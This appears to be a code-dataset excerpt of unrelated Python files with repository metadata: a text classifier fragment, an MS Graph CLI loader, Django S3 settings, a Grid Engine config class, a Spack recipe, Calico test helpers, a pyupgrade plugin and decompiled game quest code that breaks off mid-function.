results = self.sess.run(self.cnn_model.y_pred_cls, feed_dict=feed_dict)
i = 0
for res in results:
if ret[i] != None:
i=i+1
continue
ret[i] = self.categories[res]
i=i+1
return ret
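# Note on the serving contract, inferred from the classes above and stated here
# only as an illustration: `execute` receives a batch of UAI requests whose
# `.body` carries raw UTF-8 text; each text is converted to character ids,
# padded/truncated to length 600 before the session run, and the returned list
# holds one predicted category name per input in the batch.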
| 24.994975 | 87 | 0.674507 |
215e104c08bebb62fff7b125bf9ae814fc4734c7 | 2,477 | py | Python | msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py | thewahome/msgraph-cli | 33127d9efa23a0e5f5303c93242fbdbb73348671 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msgraph.cli.core import AzCommandsLoader
from azext_usersfunctions_v1_0.generated._help import helps # pylint: disable=unused-import
try:
from azext_usersfunctions_v1_0.manual._help import helps # pylint: disable=reimported
except ImportError as e:
if e.name.endswith('manual._help'):
pass
else:
raise e
class UsersFunctionsCommandsLoader(AzCommandsLoader):
def __init__(self, cli_ctx=None):
from msgraph.cli.core.commands import CliCommandType
from azext_usersfunctions_v1_0.generated._client_factory import cf_usersfunctions_v1_0_cl
usersfunctions_v1_0_custom = CliCommandType(
operations_tmpl='azext_usersfunctions_v1_0.custom#{}',
client_factory=cf_usersfunctions_v1_0_cl)
parent = super(UsersFunctionsCommandsLoader, self)
parent.__init__(cli_ctx=cli_ctx, custom_command_type=usersfunctions_v1_0_custom)
def load_command_table(self, args):
from azext_usersfunctions_v1_0.generated.commands import load_command_table
load_command_table(self, args)
try:
from azext_usersfunctions_v1_0.manual.commands import load_command_table as load_command_table_manual
load_command_table_manual(self, args)
except ImportError as e:
if e.name.endswith('manual.commands'):
pass
else:
raise e
return self.command_table
def load_arguments(self, command):
from azext_usersfunctions_v1_0.generated._params import load_arguments
load_arguments(self, command)
try:
from azext_usersfunctions_v1_0.manual._params import load_arguments as load_arguments_manual
load_arguments_manual(self, command)
except ImportError as e:
if e.name.endswith('manual._params'):
pass
else:
raise e
COMMAND_LOADER_CLS = UsersFunctionsCommandsLoader
| 41.283333 | 114 | 0.656036 |
613ad19cafaf9e4be28fc4a62e1dafa5ad488c82 | 1,187 | py | Python | docs/partial-settings.py | alexisbellido/znbstatic | ad20160c43ab33504dfb67007d6e93ced522a77f | [
"BSD-3-Clause"
] | null | null | null | docs/partial-settings.py | alexisbellido/znbstatic | ad20160c43ab33504dfb67007d6e93ced522a77f | [
"BSD-3-Clause"
] | 8 | 2019-12-04T22:18:20.000Z | 2021-09-22T17:48:33.000Z | docs/partial-settings.py | alexisbellido/znbstatic | ad20160c43ab33504dfb67007d6e93ced522a77f | [
"BSD-3-Clause"
] | null | null | null | # Add the following settings to your Django project's settings.py.
# AWS S3 settings common to static and media files
AWS_ACCESS_KEY_ID = CONFIG['aws']['s3_static']['AWS_ACCESS_KEY_ID']
AWS_SECRET_ACCESS_KEY = CONFIG['aws']['s3_static']['AWS_SECRET_ACCESS_KEY']
AWS_S3_HOST = 's3.amazonaws.com'
AWS_IS_GZIPPED = True
S3_USE_SIGV4 = True
AWS_QUERYSTRING_AUTH = False
AWS_DEFAULT_ACL = 'public-read'
# Headers' names written without dashes for AWS and Boto3.
AWS_S3_OBJECT_PARAMETERS = {
'Expires': 'Thu, Dec 31, 2099 20:00:00 GMT',
'CacheControl': 'max-age=86400',
}
# set environment variable in pod specs
STATIC_FILES_LOCAL = True if get_env_variable('STATIC_FILES_LOCAL') == '1' else False
if STATIC_FILES_LOCAL:
# hosting static files locally
STATICFILES_STORAGE = 'znbstatic.storage.VersionedStaticFilesStorage'
STATIC_URL = '/static/'
else:
# hosting static files on AWS S3
STATICFILES_STORAGE = 'znbstatic.storage.VersionedS3StaticFilesStorage'
AWS_STORAGE_STATIC_BUCKET_NAME = CONFIG['aws']['s3_static']['AWS_STORAGE_STATIC_BUCKET_NAME']
STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_STATIC_BUCKET_NAME
ZNBSTATIC_VERSION = '0.4'
| 39.566667 | 97 | 0.764954 |
71d5db7fa53fedf2f33c35634362fb4d0dc54bd3 | 283 | py | Python | package/awesome_panel/designer/components/component_with_error.py | Jhsmit/awesome-panel | 53f7754f7c505a2666f6724df26c851ae942ec40 | [
"Apache-2.0"
] | 179 | 2019-12-04T14:54:53.000Z | 2022-03-30T09:08:38.000Z | package/awesome_panel/designer/components/component_with_error.py | Jhsmit/awesome-panel | 53f7754f7c505a2666f6724df26c851ae942ec40 | [
"Apache-2.0"
] | 62 | 2019-12-14T16:51:28.000Z | 2022-03-19T18:47:12.000Z | package/awesome_panel/designer/components/component_with_error.py | Jhsmit/awesome-panel | 53f7754f7c505a2666f6724df26c851ae942ec40 | [
"Apache-2.0"
] | 35 | 2019-12-08T13:19:53.000Z | 2022-03-25T10:33:02.000Z | # pylint: disable=redefined-outer-name,protected-access
# pylint: disable=missing-function-docstring,missing-module-docstring,missing-class-docstring
# pylint: disable=too-few-public-methods
class ComponentWithError:
def __init__(self):
raise NotImplementedError()
| 40.428571 | 94 | 0.777385 |
a29d7e71a93da2c4dc7a235c6820744c7884a9e2 | 1,907 | py | Python | Crack/processor_Crack.py | neil7/Crack-Detection-Capsule-Network | 2666280f48ddd42a32b301ded29a02906f7823cd | [
"Unlicense"
] | 4 | 2018-12-20T20:41:38.000Z | 2020-03-07T17:27:53.000Z | Crack/processor_Crack.py | neil7/Crack-Detection-Capsule-Network | 2666280f48ddd42a32b301ded29a02906f7823cd | [
"Unlicense"
] | null | null | null | Crack/processor_Crack.py | neil7/Crack-Detection-Capsule-Network | 2666280f48ddd42a32b301ded29a02906f7823cd | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 29 12:02:20 2018
@author: Neil sharma
"""
from keras.preprocessing.image import img_to_array,load_img
#from sklearn.preprocessing import StandardScaler
import numpy as np
import os
from scipy.misc import imresize
#import argparse
image_store = []
#List of all Videos in the Source Directory.
#videos=os.listdir(video_source_path)
#Make a temp dir to store all the frames
#os.mkdir(video_source_path + '/frames')
ped1_path = r"D:\ML\Shrey Anomaly detection\Dataset\Crack\Data"
paths = os.listdir(ped1_path)
for path in paths:
framepath = ped1_path + "/" + path
"""for video in videos:
os.system( 'ffmpeg -i {}/{} -r 1/{} {}/frames/%03d.jpg'.format(video_source_path,video,fps,video_source_path))"""
images = os.listdir(framepath)
for image in images:
#image_path = framepath + "/" + image
image_path = framepath + "/" + image
img = load_img(image_path)
img = img_to_array(img)
        #Resize the Image to (32,32,3) for the network to be able to process it.
img = imresize(img,(32,32,3))
#Convert the Image to Grayscale
g = 0.2989*img[:,:,0] + 0.5870*img[:,:,1] + 0.1140*img[:,:,2]
image_store.append(g)
#store(image_path)
image_store = np.array(image_store)
image_store.shape
a, b, c = image_store.shape
#Reshape to (32,32,batch_size)
image_store.resize(b,c,a)
#Normalize
image_store=(image_store-image_store.mean())/(image_store.std())
#Clip negative Values
image_store=np.clip(image_store,0,1)
#label = []
#label[0] = image_store[:, :, 343]
np.save('Crack.npy',image_store)
print("Saved file to disk") | 28.893939 | 122 | 0.592554 |
3aec69bb37ebfd77583d9e158a2db81039f89d45 | 5,348 | py | Python | uge/objects/qconf_dict_list.py | gridengine/config-api | 694f9667bb6569170356336283a18351456e8b82 | [
"Apache-2.0"
] | 6 | 2017-01-18T00:11:19.000Z | 2022-02-10T08:18:00.000Z | uge/objects/qconf_dict_list.py | gridengine/config-api | 694f9667bb6569170356336283a18351456e8b82 | [
"Apache-2.0"
] | 3 | 2017-05-11T13:54:42.000Z | 2020-08-12T06:15:43.000Z | uge/objects/qconf_dict_list.py | gridengine/config-api | 694f9667bb6569170356336283a18351456e8b82 | [
"Apache-2.0"
] | 4 | 2017-05-11T13:27:33.000Z | 2019-10-29T02:02:24.000Z | #!/usr/bin/env python
#
# ___INFO__MARK_BEGIN__
#######################################################################################
# Copyright 2016-2021 Univa Corporation (acquired and owned by Altair Engineering Inc.)
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License.
#
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#######################################################################################
# ___INFO__MARK_END__
#
from uge.exceptions import InvalidRequest
try:
import UserList
except ImportError:
import collections as UserList
from .qconf_object import QconfObject
from uge.exceptions.invalid_argument import InvalidArgument
class QconfDictList(QconfObject, UserList.UserList):
""" This class encapsulates data and functionality common to all Qconf objects based on a list of dictionaries. """
FIRST_KEY = None
NAME_KEY = None
USER_PROVIDED_KEYS = []
REQUIRED_DATA_DEFAULTS = {}
KEY_VALUE_DELIMITER = '='
def __init__(self, data=None, metadata=None, json_string=None):
"""
Class constructor.
:param data: Configuration data. If provided, it will override corresponding data from JSON string representation.
:type data: dict
:param metadata: Configuration metadata. If provided, it will override corresponding metadata from JSON string representation.
:type metadata: dict
:param json_string: Configuration JSON string representation.
:type json_string: str
:raises: **InvalidArgument** - in case metadata is not a dictionary, JSON string is not valid, or it does not represent a list of dictionaries object.
"""
UserList.UserList.__init__(self)
QconfObject.__init__(self, data=data, metadata=metadata, json_string=json_string)
def check_input_data(self, data):
if type(data) != list:
raise InvalidArgument('Provided data is not a list: %s.' % str(data))
for d in data:
if type(d) != dict:
raise InvalidArgument('List member is not a dictionary: %s.' % str(d))
def update_with_required_data_defaults(self):
"""
Updates list objects with default values for required data keys.
:raises: **InvalidArgument** - in case object's data is not a list, or one of the list members is not a dictionary.
"""
if type(self.data) != list:
raise InvalidRequest('Data object is not a list: %s.' % str(self.data))
for d in self.data:
if type(d) != dict:
raise InvalidArgument('List member is not a dictionary: %s.' % str(d))
for (key, value) in list(self.get_required_data_defaults().items()):
if key not in d:
d[key] = value
def check_user_provided_keys(self):
"""
Checks for presence of all data keys that must be provided by user.
:raises: **InvalidRequest** - in case object's data is not a dictionary, or if any of the required keys are missing.
"""
for d in self.data:
if type(d) != dict:
raise InvalidRequest('List member is not a dictionary: %s.' % str(d))
for key in self.USER_PROVIDED_KEYS:
if not d.get(key):
raise InvalidRequest('Input data %s is missing required object key: %s.' % (str(d), str(key)))
def to_uge(self):
"""
Converts object to string acceptable as input for UGE qconf command.
:returns: Object's UGE-formatted string.
"""
lines = ''
for d in self.data:
for (key, value) in list(d.items()):
lines += '%s%s%s\n' % (key, self.KEY_VALUE_DELIMITER, self.py_to_uge(key, value))
return lines
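    # Illustration with hypothetical keys (the real keys depend on the concrete
    # subclass): for data such as
    #   [{'name': 'all.q', 'slots': 4}, {'name': 'short.q', 'slots': 2}]
    # to_uge() emits one key=value line per entry:
    #   name=all.q
    #   slots=4
    #   name=short.q
    #   slots=2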
def convert_data_to_uge_keywords(self, data):
for d in data:
for (key, value) in list(d.items()):
d[key] = self.py_to_uge(key, value)
def set_data_dict_list_from_qconf_output(self, qconf_output):
data = self.to_dict_list(qconf_output)
self.data = data
def to_dict_list(self, input_string):
lines = input_string.split('\n')
dict_list = []
object_data = {}
# Parse lines until first object key is found, and then
# create new dictionary object
for line in lines:
if not line:
continue
key_value = line.split(self.KEY_VALUE_DELIMITER)
key = key_value[0]
value = self.KEY_VALUE_DELIMITER.join(key_value[1:]).strip()
if key == self.FIRST_KEY:
object_data = {}
dict_list.append(object_data)
object_data[key] = self.uge_to_py(key, value)
return dict_list
#############################################################################
# Testing.
if __name__ == '__main__':
pass
| 38.47482 | 158 | 0.608826 |
0ce3cbf0db2e0a1fcb33a029f7ae581085246fc6 | 3,188 | py | Python | pykeval/pykeval/broker/remote_server.py | SilverTuxedo/keval | 73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7 | [
"MIT"
] | 34 | 2021-09-17T16:17:58.000Z | 2022-03-11T06:23:21.000Z | pykeval/pykeval/broker/remote_server.py | fengjixuchui/keval | 73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7 | [
"MIT"
] | null | null | null | pykeval/pykeval/broker/remote_server.py | fengjixuchui/keval | 73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7 | [
"MIT"
] | 4 | 2021-09-17T19:39:29.000Z | 2022-03-10T07:06:43.000Z | import logging
import pickle
from socketserver import BaseRequestHandler, TCPServer
from pykeval.broker.local import LocalBroker
from pykeval.broker.requests import BrokerResponse, BrokerResponseType, BrokerRequest, BrokerRequestType
from pykeval.broker.messaging import receive, send
logger = logging.getLogger(__name__)
class BrokerRequestHandler(BaseRequestHandler):
broker_server = None
def handle(self) -> None:
logger.info(f"Got connection from {self.client_address}")
data = receive(self.request)
logger.debug("Received")
try:
request = pickle.loads(data)
# noinspection PyProtectedMember
response_data = self.__class__.broker_server._on_new_request(request)
response = BrokerResponse(BrokerResponseType.SUCCESS, response_data)
except Exception as e:
logger.exception("Error processing request")
response = BrokerResponse(BrokerResponseType.EXCEPTION, e)
logger.debug("Serializing and sending response")
serialized_response = pickle.dumps(response)
send(self.request, serialized_response)
logger.info(f"Sent response to {self.client_address}")
class RemoteBrokerServer:
"""
A broker server based on a local broker over TCP. This works together with `RemoteBroker` to allow running code on a
different machine than the client itself.
"""
def __init__(self, local_broker: LocalBroker, address: str, port: int):
"""
:param local_broker: The actual local broker that will handle requests
:param address: The address of the server
:param port: The port of the server
"""
self._local_broker = local_broker
self._address = address
self._port = port
def start(self):
"""
Starts the TCP server.
"""
handler_type = type("BoundBrokerRequestHandler", (BrokerRequestHandler,), {"broker_server": self})
with TCPServer((self._address, self._port), handler_type) as server:
logger.info(f"Starting server at {self._address}:{self._port}")
server.serve_forever()
def _on_new_request(self, request: BrokerRequest):
"""
Handles a broker request.
:return: What the local broker returned for the request
:raises ValueError if the request type is not supported.
"""
# No-data requests
if request.type == BrokerRequestType.GET_POINTER_SIZE:
return self._local_broker.get_pointer_size()
# Data requests
try:
handler = {
BrokerRequestType.CALL_FUNCTION: self._local_broker.call_function,
BrokerRequestType.READ_BYTES: self._local_broker.read_bytes,
BrokerRequestType.WRITE_BYTES: self._local_broker.write_bytes,
BrokerRequestType.ALLOCATE: self._local_broker.allocate,
BrokerRequestType.FREE: self._local_broker.free
}[request.type]
return handler(request.data)
except KeyError:
pass
raise ValueError(f"Unrecognized request type {request.type.value}")
| 35.820225 | 120 | 0.67064 |
b523160db88a32431886e9c2c04ede8ccb5f3f73 | 4,697 | py | Python | var/spack/repos/builtin/packages/cctools/package.py | hseara/spack | 4c9c5393f1fad00b7e8c77661a02b236db2d0e40 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/cctools/package.py | hseara/spack | 4c9c5393f1fad00b7e8c77661a02b236db2d0e40 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11 | 2021-05-12T06:06:20.000Z | 2022-03-30T23:10:14.000Z | var/spack/repos/builtin/packages/cctools/package.py | btovar/spack | f901c61e684a251c4396221517ff492a741dd946 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Cctools(AutotoolsPackage):
"""The Cooperative Computing Tools (cctools) enable large scale
distributed computations to harness hundreds to thousands of
machines from clusters, clouds, and grids.
"""
homepage = "https://cctools.readthedocs.io"
url = "https://ccl.cse.nd.edu/software/files/cctools-7.2.3-source.tar.gz"
version('7.2.3', sha256='c9d32f9e9d4886ef88b79cc7c898c26e8369a004132080697b8523560cb8765b')
version('7.2.2', sha256='3eee05826954792e3ef974fefe3b8e436f09cd368b195287639b67f5acfa050f')
version('7.2.1', sha256='8f847fef9bca1ebd23a93d74fc093807d2c3e584111c087cf25e070e130eb820')
version('7.1.7', sha256='63cbfabe52591d41a1b27040bf27700d2a11b2f30cb2e25132e0016fb1aade03')
version('7.1.5', sha256='c01415fd47a1d9626b6c556e0dc0a6b0d3cd67224fa060cabd44ff78eede1d8a')
version('7.1.3', sha256='b937878ab429dda31bc692e5d9ffb402b9eb44bb674c07a934bb769cee4165ba')
version('7.1.2', sha256='ca871e9fe245d047d4c701271cf2b868e6e3a170e8834c1887157ed855985131')
version('7.1.0', sha256='84748245db10ff26c0c0a7b9fd3ec20fbbb849dd4aadc5e8531fd1671abe7a81')
version('7.0.18', sha256='5b6f3c87ae68dd247534a5c073eb68cb1a60176a7f04d82699fbc05e649a91c2')
version('6.1.1', sha256='97f073350c970d6157f80891b3bf6d4f3eedb5f031fea386dc33e22f22b8af9d')
depends_on('openssl')
depends_on('perl+shared', type=('build', 'run'))
depends_on('python', type=('build', 'run'))
depends_on('readline')
depends_on('gettext') # Corrects python linking of -lintl flag.
depends_on('swig')
# depends_on('xrootd')
depends_on('zlib')
patch('arm.patch', when='target=aarch64:')
patch('cctools_7.0.18.python.patch', when='@7.0.18')
patch('cctools_6.1.1.python.patch', when='@6.1.1')
# Generally SYS_foo is defined to __NR_foo (sys/syscall.h) which
# is then defined to a syscall number (asm/unistd_64.h). Certain
# CentOS systems have SYS_memfd_create defined to
# __NR_memfd_create but are missing the second definition.
# This is a belt and suspenders solution to the problem.
def patch(self):
before = '#if defined(__linux__) && defined(SYS_memfd_create)'
after = '#if defined(__linux__) && defined(SYS_memfd_create) && defined(__NR_memfd_create)' # noqa: E501
f = 'dttools/src/memfdexe.c'
kwargs = {'ignore_absent': False, 'backup': True, 'string': True}
filter_file(before, after, f, **kwargs)
if self.spec.satisfies('%fj'):
makefiles = ['chirp/src/Makefile', 'grow/src/Makefile']
for m in makefiles:
filter_file('-fstack-protector-all', '', m)
def configure_args(self):
args = []
# make sure we do not pick a python outside spack:
if self.spec.satisfies('@6.1.1'):
if self.spec.satisfies('^python@3:'):
args.extend([
'--with-python3-path', self.spec['python'].prefix,
'--with-python-path', 'no'
])
elif self.spec.satisfies('^python@:2.9'):
args.extend([
'--with-python-path', self.spec['python'].prefix,
'--with-python3-path', 'no'
])
else:
args.extend([
'--with-python-path', 'no',
'--with-python3-path', 'no'
])
else:
# versions 7 and above, where --with-python-path recognized the
# python version:
if self.spec.satisfies('^python@3:'):
args.extend([
'--with-python-path', self.spec['python'].prefix,
'--with-python2-path', 'no'
])
elif self.spec.satisfies('^python@:2.9'):
args.extend([
'--with-python-path', self.spec['python'].prefix,
'--with-python3-path', 'no'
])
else:
args.extend([
'--with-python2-path', 'no',
'--with-python3-path', 'no'
])
# disable these bits
for p in ['mysql', 'xrootd']:
args.append('--with-{0}-path=no'.format(p))
# point these bits at the Spack installations
for p in ['openssl', 'perl', 'readline', 'swig', 'zlib']:
args.append('--with-{0}-path={1}'.format(p, self.spec[p].prefix))
return args
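    # For illustration only (hypothetical spec 'cctools ^python@3.8'), the logic
    # above yields configure flags along the lines of:
    #   --with-python-path=<python prefix> --with-python2-path=no
    #   --with-mysql-path=no --with-xrootd-path=no
    #   --with-openssl-path=<openssl prefix> ... --with-zlib-path=<zlib prefix>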
| 44.733333 | 113 | 0.609751 |
e5f974693e019a0bc8df44b85de3a978ca622281 | 745 | py | Python | Week 5 - playList/Week 5 Task.py | Jasleenk47/BeginnerRoom-2020 | 32903f6917a236fe685106c148b8531c62210f1f | [
"Unlicense"
] | 5 | 2021-01-19T00:31:22.000Z | 2021-03-05T02:31:10.000Z | Week 5 - playList/Week 5 Task.py | Jasleenk47/BeginnerRoom-2020 | 32903f6917a236fe685106c148b8531c62210f1f | [
"Unlicense"
] | 34 | 2021-01-14T21:00:18.000Z | 2021-03-11T17:57:26.000Z | Week 5 - playList/Week 5 Task.py | Jasleenk47/BeginnerRoom-2020 | 32903f6917a236fe685106c148b8531c62210f1f | [
"Unlicense"
] | 43 | 2021-01-14T20:40:47.000Z | 2021-03-11T02:29:30.000Z | sad_playlist = ["SO DONE"]
print(sad_playlist)
sad_playlist.append("Reminds Me of You")
print(sad_playlist)
sad_playlist.sort(reverse=True)
print(sad_playlist)
sad_playlist.append("WITHOUT YOU")
print(sad_playlist)
sad_playlist.sort(reverse=False)
print(sad_playlist)
print("")
print("THIS IS JUST EXTRA (I WAS JUST BORED AND SURPRISED THAT THE TASK FOR THIS WEEK WAS THIS EASY). HEHE")
print("P.S. Kid Laroi was either the solo artist or featured on these tracks.")
print("")
print("Full Depressing Playlist: ")
print ("1. SO DONE")
print ("2. TRAGIC")
print("3. ALWAYS DO")
print("4. FEEL SOMETHING")
print("5. WITHOUT YOU")
print("6. GO")
print("7. Reminds Me of You")
print("8. WRONG")
print("")
print("These are only some.") | 18.170732 | 108 | 0.718121 |
ec6f3f05c10daed0201cea0a439f5926c4d9509b | 5,350 | py | Python | calico_test/tests/st/utils/workload.py | tomdee/calico-containers | 09abe8353456acc2cec8fe55b7cfe07a4d8cad2f | [
"Apache-2.0"
] | null | null | null | calico_test/tests/st/utils/workload.py | tomdee/calico-containers | 09abe8353456acc2cec8fe55b7cfe07a4d8cad2f | [
"Apache-2.0"
] | 3 | 2015-07-30T19:18:58.000Z | 2015-07-30T23:32:19.000Z | calico_test/tests/st/utils/workload.py | tomdee/calico-docker | 09abe8353456acc2cec8fe55b7cfe07a4d8cad2f | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import logging
from netaddr import IPAddress
from utils import retry_until_success, debug_failures
from network import DockerNetwork
from exceptions import CommandExecError
NET_NONE = "none"
logger = logging.getLogger(__name__)
class Workload(object):
"""
A calico workload.
These are the end-users containers that will run application-level
software.
"""
def __init__(self, host, name, image="busybox", network="bridge"):
"""
Create the workload and detect its IPs.
:param host: The host container on which this workload is instantiated.
All commands executed by this container will be passed through the host
via docker exec.
:param name: The name given to the workload container. This name is
passed to docker and can be used inside docker commands.
:param image: The docker image to be used to instantiate this
container. busybox used by default because it is extremely small and
has ping.
:param network: The DockerNetwork to connect to. Set to None to use
default Docker networking.
"""
self.host = host
self.name = name
command = "docker run -tid --name %s --net %s %s" % (name,
network,
image)
host.execute(command)
self.ip = host.execute("docker inspect --format "
"'{{.NetworkSettings.Networks.%s.IPAddress}}' %s"
% (network, name))
def execute(self, command):
"""
Execute arbitrary commands on this workload.
"""
# Make sure we've been created in the context of a host. Done here
# instead of in __init__ as we can't exist in the host until we're
# created.
assert self in self.host.workloads
return self.host.execute("docker exec %s %s" % (self.name, command))
def _get_ping_function(self, ip):
"""
Return a function to ping the supplied IP address from this workload.
:param ip: The IPAddress to ping.
:return: A partial function that can be executed to perform the ping.
The function raises a CommandExecError exception if the ping fails,
or returns the output of the ping.
"""
# Default to "ping"
ping = "ping"
try:
version = IPAddress(ip).version
assert version in [4, 6]
if version == 6:
ping = "ping6"
except BaseException:
pass
args = [
ping,
"-c", "1", # Number of pings
"-W", "1", # Timeout for each ping
ip,
]
command = ' '.join(args)
ping = partial(self.execute, command)
return ping
@debug_failures
def assert_can_ping(self, ip, retries=0):
"""
Execute a ping from this workload to the ip. Assert than a workload
can ping an IP. Use retries to allow for convergence.
Use of this method assumes the network will be transitioning from a
state where the destination is currently unreachable.
:param ip: The IP address (str or IPAddress) to ping.
:param retries: The number of retries.
:return: None.
"""
try:
retry_until_success(self._get_ping_function(ip),
retries=retries,
ex_class=CommandExecError)
except CommandExecError:
raise AssertionError("%s cannot ping %s" % (self, ip))
@debug_failures
def assert_cant_ping(self, ip, retries=0):
"""
Execute a ping from this workload to the ip. Assert that the workload
cannot ping an IP. Use retries to allow for convergence.
Use of this method assumes the network will be transitioning from a
state where the destination is currently reachable.
:param ip: The IP address (str or IPAddress) to ping.
:param retries: The number of retries.
:return: None.
"""
ping = self._get_ping_function(ip)
def cant_ping():
try:
ping()
except CommandExecError:
pass
else:
raise _PingError()
try:
retry_until_success(cant_ping,
retries=retries,
ex_class=_PingError)
except _PingError:
raise AssertionError("%s can ping %s" % (self, ip))
def __str__(self):
return self.name
class _PingError(Exception):
pass
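# Usage sketch (illustrative only): given a test-harness host object `host`,
# two workloads on the default bridge network can be checked for connectivity.
# Host construction is framework-specific and omitted here.
#
#   w1 = Workload(host, "w1")   # busybox container on the default bridge network
#   w2 = Workload(host, "w2")
#   w1.assert_can_ping(w2.ip, retries=10)
#   w1.assert_cant_ping("10.255.255.1", retries=3)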
| 34.294872 | 79 | 0.595327 |
a604dbfc0c74a10c08797b6ddc3d87cd48baae7f | 1,378 | py | Python | pyupgrade/_plugins/c_element_tree.py | adamchainz/pyupgrade | ccf3a9192fca6d2883b1e67d785e0010243e30c3 | [
"MIT"
] | 1,615 | 2017-03-17T02:45:59.000Z | 2022-03-31T18:53:20.000Z | pyupgrade/_plugins/c_element_tree.py | jiayanali/pyupgrade | b6e103248fd97b04d2bea898b95d1d8776fece57 | [
"MIT"
] | 357 | 2017-03-13T00:32:34.000Z | 2022-03-25T14:51:19.000Z | pyupgrade/_plugins/c_element_tree.py | jiayanali/pyupgrade | b6e103248fd97b04d2bea898b95d1d8776fece57 | [
"MIT"
] | 130 | 2017-06-23T04:28:50.000Z | 2022-03-31T11:33:19.000Z | import ast
from typing import Iterable
from typing import List
from typing import Tuple
from tokenize_rt import Offset
from tokenize_rt import Token
from pyupgrade._ast_helpers import ast_to_offset
from pyupgrade._data import register
from pyupgrade._data import State
from pyupgrade._data import TokenFunc
from pyupgrade._token_helpers import find_token
def _replace_celementtree_with_elementtree(
i: int,
tokens: List[Token],
) -> None:
j = find_token(tokens, i, 'cElementTree')
tokens[j] = tokens[j]._replace(src='ElementTree')
@register(ast.ImportFrom)
def visit_ImportFrom(
state: State,
node: ast.ImportFrom,
parent: ast.AST,
) -> Iterable[Tuple[Offset, TokenFunc]]:
if (
state.settings.min_version >= (3,) and
node.module == 'xml.etree.cElementTree' and
node.level == 0
):
yield ast_to_offset(node), _replace_celementtree_with_elementtree
@register(ast.Import)
def visit_Import(
state: State,
node: ast.Import,
parent: ast.AST,
) -> Iterable[Tuple[Offset, TokenFunc]]:
if (
state.settings.min_version >= (3,) and
len(node.names) == 1 and
node.names[0].name == 'xml.etree.cElementTree' and
node.names[0].asname is not None
):
yield ast_to_offset(node), _replace_celementtree_with_elementtree
| 27.019608 | 73 | 0.682874 |
320a9f30027fd584051191ff0d788fe7fcb7b5ee | 24,751 | py | Python | pirates/quest/QuestPath.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 3 | 2021-02-25T06:38:13.000Z | 2022-03-22T07:00:15.000Z | pirates/quest/QuestPath.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | null | null | null | pirates/quest/QuestPath.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 1 | 2021-02-25T06:38:17.000Z | 2021-02-25T06:38:17.000Z | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.quest.QuestPath
from pandac.PandaModules import TransformState
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import report
from pirates.pirate import AvatarType, AvatarTypes
from pirates.piratesbase import PiratesGlobals
from pirates.quest import QuestConstants
from pirates.piratesbase import TeamUtils
from pirates.world import LocationConstants
import types, copy
class QuestGoal:
__module__ = __name__
Type_Uid = 0
Type_Custom = 1
LEVEL_IDX = 0
TYPE_IDX = 1
FACTION_IDX = 2
HULL_IDX = 3
FLAGSHIP_IDX = 4
LOCATION_IDX = 5
MAX_IDX = 6
GOAL_TYPE_DINGHY = 'dinghy'
GOAL_TYPE_SHIP = 'ship'
GOAL_TYPES_OCEAN = [GOAL_TYPE_SHIP]
def __init__(self, typeInfo):
self.__goalDataStr = None
if typeInfo == None:
self.__goalType = types.ListType
self.__goalData = []
return
if type(typeInfo) == types.StringType:
typeInfo = [typeInfo]
self.__goalData = typeInfo
self.__goalType = type(self.__goalData)
return
def getType(self):
if self.__goalType == types.DictType:
return self.Type_Custom
return self.Type_Uid
def getTargetType(self):
if self.__goalType == types.DictType:
return self.__goalData.get(self.TYPE_IDX)
return (0, 0, 0, 0)
def getTargetTypeOnlyOnOcean(self):
return self.getTargetType() in self.GOAL_TYPES_OCEAN
def getLocation(self):
if self.__goalType == types.DictType:
return self.__goalData.get(self.LOCATION_IDX)
return
def compareTo(self, object, goalOwner=None):
if self.__goalType == types.DictType:
